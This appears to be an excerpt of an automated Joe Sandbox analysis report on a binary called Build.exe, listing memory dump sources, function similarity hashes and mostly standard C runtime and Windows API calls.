                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AdjustPointer$_abort
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2252061734-0
                                                                                                                                                                                • Opcode ID: 1339c26d4a7cd26f510bd41aa95dd4fc4d026e666d06ea62af1bb8239fa74f35
                                                                                                                                                                                • Instruction ID: d89d876b049300a7d948f8a5a695178a8cdd922c783fc53246170c4b63eddbe8
                                                                                                                                                                                • Opcode Fuzzy Hash: 1339c26d4a7cd26f510bd41aa95dd4fc4d026e666d06ea62af1bb8239fa74f35
                                                                                                                                                                                • Instruction Fuzzy Hash: 20510472600A069FDB398F54D991BBAB3E4FF44B40F1444ADEC06872A1D779ECA0CB94
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00B6E589
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6E5AC
                                                                                                                                                                                  • Part of subcall function 00B6BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B66A24,?,0000015D,?,?,?,?,00B67F00,000000FF,00000000,?,?), ref: 00B6BCC0
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B6E5D2
                                                                                                                                                                                • _free.LIBCMT ref: 00B6E5E5
                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B6E5F4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                                                • Opcode ID: d33e5ddfc5b0a43bae34335de1a09c06b7d6566fcfbf184993ebcc04dd256729
                                                                                                                                                                                • Instruction ID: 5820a25e5bf14569f08185ce6e6825b009f2bf77181a65f5fc5f7a371d7d903b
                                                                                                                                                                                • Opcode Fuzzy Hash: d33e5ddfc5b0a43bae34335de1a09c06b7d6566fcfbf184993ebcc04dd256729
                                                                                                                                                                                • Instruction Fuzzy Hash: 1601D47A6016117F272156B65C8DC7B6AADFEC2B6431401A9B81AD7101FE68CD01C6B0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00B6BC80,00B6D7D8,?,00B6B9D3,00000001,00000364,?,00B6688D,?,?,00B850C4), ref: 00B6BA2E
                                                                                                                                                                                • _free.LIBCMT ref: 00B6BA63
                                                                                                                                                                                • _free.LIBCMT ref: 00B6BA8A
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00B850C4), ref: 00B6BA97
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00B850C4), ref: 00B6BAA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                • Opcode ID: 92273d86045707b43664980e82bd79d03e3d8a40cf998a847dafa6eda7acf811
                                                                                                                                                                                • Instruction ID: d4011c561356fcde266c1844e2ca67f182189953c2526222ed975c6529e92c91
                                                                                                                                                                                • Opcode Fuzzy Hash: 92273d86045707b43664980e82bd79d03e3d8a40cf998a847dafa6eda7acf811
                                                                                                                                                                                • Instruction Fuzzy Hash: CA01F436604A01AB8216F7B55CD6E6B22FEDBC137172000A8F50AE32A1EF7D8C815160
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 00B6EE67
                                                                                                                                                                                  • Part of subcall function 00B6BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?), ref: 00B6BB10
                                                                                                                                                                                  • Part of subcall function 00B6BAFA: GetLastError.KERNEL32(?,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?,?), ref: 00B6BB22
                                                                                                                                                                                • _free.LIBCMT ref: 00B6EE79
                                                                                                                                                                                • _free.LIBCMT ref: 00B6EE8B
                                                                                                                                                                                • _free.LIBCMT ref: 00B6EE9D
                                                                                                                                                                                • _free.LIBCMT ref: 00B6EEAF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 4770c8f6cf32b546357e87ed1eaaedb32a985eefe8478bf9a5b6c0fda021986b
                                                                                                                                                                                • Instruction ID: f1e6805a82d1ba39acc23376fbed7b072b1f79ab11f78b87eb00836992c9a46d
                                                                                                                                                                                • Opcode Fuzzy Hash: 4770c8f6cf32b546357e87ed1eaaedb32a985eefe8478bf9a5b6c0fda021986b
                                                                                                                                                                                • Instruction Fuzzy Hash: C5F09736504200EF86A4EBA9E986C9A77FEFA007117650889F45ED7551CFB9FC808B64
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B17E
                                                                                                                                                                                  • Part of subcall function 00B6BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?), ref: 00B6BB10
                                                                                                                                                                                  • Part of subcall function 00B6BAFA: GetLastError.KERNEL32(?,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?,?), ref: 00B6BB22
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B190
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B1A3
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B1B4
                                                                                                                                                                                • _free.LIBCMT ref: 00B6B1C5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: b3060e3549735331976c6bfeeb9aed8d589d06cb1479daccc7d44f37b5bbf0ec
                                                                                                                                                                                • Instruction ID: 4c143c8265965f5e2d2a50828644a81df3139d75efab4d02e5ebe2b918019ccc
                                                                                                                                                                                • Opcode Fuzzy Hash: b3060e3549735331976c6bfeeb9aed8d589d06cb1479daccc7d44f37b5bbf0ec
                                                                                                                                                                                • Instruction Fuzzy Hash: 50F0D0B1820210AFC741EF55FC0388837F6F716725309418AF41A97271CF7A0881CF94
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _swprintf
                                                                                                                                                                                • String ID: %ls$%s: %s
                                                                                                                                                                                • API String ID: 589789837-2259941744
                                                                                                                                                                                • Opcode ID: acfac63721bb619074b64fdbe94c401418dc885e708a1971354908c50db3d3e3
                                                                                                                                                                                • Instruction ID: 2472c30cd8cea481875ad699d88e9e113feb4efea234cd29d0d18979ba8a49f4
                                                                                                                                                                                • Opcode Fuzzy Hash: acfac63721bb619074b64fdbe94c401418dc885e708a1971354908c50db3d3e3
                                                                                                                                                                                • Instruction Fuzzy Hash: 1B511CF5648304F9F6212AA48DC2F3976E4AB0DF43F1445C6BF87642E1C6A19B5CAF12
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe,00000104), ref: 00B6A800
                                                                                                                                                                                • _free.LIBCMT ref: 00B6A8CB
                                                                                                                                                                                • _free.LIBCMT ref: 00B6A8D5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe
                                                                                                                                                                                • API String ID: 2506810119-3642456277
                                                                                                                                                                                • Opcode ID: 773c8e19977bb2b27b026f81d32156ad87161bbdebda97e4f030dbc9f4ee4347
                                                                                                                                                                                • Instruction ID: dc1f46f5cdd186d368a00a39401de59e2e148a0b2440a8c1185cee7c0a06b5cb
                                                                                                                                                                                • Opcode Fuzzy Hash: 773c8e19977bb2b27b026f81d32156ad87161bbdebda97e4f030dbc9f4ee4347
                                                                                                                                                                                • Instruction Fuzzy Hash: 873161B1E00218EFDF21DF99D985D9EBBFCEB85310B1440A6E904A7211DA784E41DFA1
                                                                                                                                                                                APIs
                                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00B6581B
                                                                                                                                                                                • _abort.LIBCMT ref: 00B65926
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EncodePointer_abort
                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                • API String ID: 948111806-2084237596
                                                                                                                                                                                • Opcode ID: 3927fe559ecbbd9232410748bff5c8f6fb29dca712190efa8b0c9bf92076a1fb
                                                                                                                                                                                • Instruction ID: 887e664b176de8e41f27afde30a31c00f45e41e2401ce821408b16017a7a8934
                                                                                                                                                                                • Opcode Fuzzy Hash: 3927fe559ecbbd9232410748bff5c8f6fb29dca712190efa8b0c9bf92076a1fb
                                                                                                                                                                                • Instruction Fuzzy Hash: 2E411671900609EFCF25DF94CD81AAEBBF5FF48314F1881A9F905A7251D3399960DB60
                                                                                                                                                                                APIs
                                                                                                                                                                                • __fprintf_l.LIBCMT ref: 00B4F82D
                                                                                                                                                                                • _strncpy.LIBCMT ref: 00B4F871
                                                                                                                                                                                  • Part of subcall function 00B53F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00B4F801,00000000,00000000,?,00B85070,?,00B4F801,?,?,00000050,?), ref: 00B53F64
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                                                                • String ID: $%s$@%s
                                                                                                                                                                                • API String ID: 562999700-834177443
                                                                                                                                                                                • Opcode ID: c32391066d8ea0af1ac03ba68966359ae8d718abcbd5bfc90ad4d8a61eaf4e5b
                                                                                                                                                                                • Instruction ID: a92617c11df98a1d77dd840d81b59cf0a684dbc336d4fd2d8422e26a66a14e70
                                                                                                                                                                                • Opcode Fuzzy Hash: c32391066d8ea0af1ac03ba68966359ae8d718abcbd5bfc90ad4d8a61eaf4e5b
                                                                                                                                                                                • Instruction Fuzzy Hash: 1821397290030ADBDB21DFA48C41BBE77E8FB15700F0405AAF9259B1A1E772EA199B51
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B41366: GetDlgItem.USER32(00000000,00003021), ref: 00B413AA
                                                                                                                                                                                  • Part of subcall function 00B41366: SetWindowTextW.USER32(00000000,00B765F4), ref: 00B413C0
                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00B5CE28
                                                                                                                                                                                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00B5CE3D
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B5CE52
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemText$DialogWindow
                                                                                                                                                                                • String ID: ASKNEXTVOL
                                                                                                                                                                                • API String ID: 445417207-3402441367
                                                                                                                                                                                • Opcode ID: ab6ff7c6f628c195532b92dda7306aa895c357c55817dc048104f69a603a7398
                                                                                                                                                                                • Instruction ID: f0459bc3d7a9d20446a383fdd22389cb5838ecd8c84e23cc1bfff8d099417bc0
                                                                                                                                                                                • Opcode Fuzzy Hash: ab6ff7c6f628c195532b92dda7306aa895c357c55817dc048104f69a603a7398
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F118732644301BFD6219F68DD46F6A3FEAFB4BB42F0004D4FA41A71A8CB616E0D9765
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                                • API String ID: 0-56093855
                                                                                                                                                                                • Opcode ID: 81e9c6dd9b204a16673fa761b46f23c1aeba1a8f8ead613a746ef2fbb4998047
                                                                                                                                                                                • Instruction ID: 30055410a9ad23a6770f6412aab3017594dc8a8c729f42e36b0cf8996af6b563
                                                                                                                                                                                • Opcode Fuzzy Hash: 81e9c6dd9b204a16673fa761b46f23c1aeba1a8f8ead613a746ef2fbb4998047
                                                                                                                                                                                • Instruction Fuzzy Hash: 5401D471618209EFD7115F29EC88B677FE8FB06750F0440A5F905A3270DF318890DBA0
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00B44B42
                                                                                                                                                                                  • Part of subcall function 00B6106D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B61079
                                                                                                                                                                                  • Part of subcall function 00B6106D: ___delayLoadHelper2@8.DELAYIMP ref: 00B6109F
                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00B44B4D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                                                                                                                                                                                • String ID: string too long$vector too long
                                                                                                                                                                                • API String ID: 2355824318-1617939282
                                                                                                                                                                                • Opcode ID: f78e0ab14cfae1441c62f4556e1d0964136a7c046db19cf7919f19e683d5aa3d
                                                                                                                                                                                • Instruction ID: f39eb1808db7673b26f78f9b91ad7c30d0ae5efc9597c0dda77fc89484e6706e
                                                                                                                                                                                • Opcode Fuzzy Hash: f78e0ab14cfae1441c62f4556e1d0964136a7c046db19cf7919f19e683d5aa3d
                                                                                                                                                                                • Instruction Fuzzy Hash: E4F0A0312007046B8A34AF59DC45E4AB3FDEF84B2072009AAF985C3601D3B0EA5487F1
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1036877536-0
                                                                                                                                                                                • Opcode ID: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                                                                                                                                                                • Instruction ID: f9aa518c21032dfa72a468b661609da311c78ceca2313bbed843ae0f84b9c45c
                                                                                                                                                                                • Opcode Fuzzy Hash: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                                                                                                                                                                • Instruction Fuzzy Hash: D1A127729003869FDB15CF58C8A17BEBFE4EF52350F2881E9E9D5AB242C23C8941C755
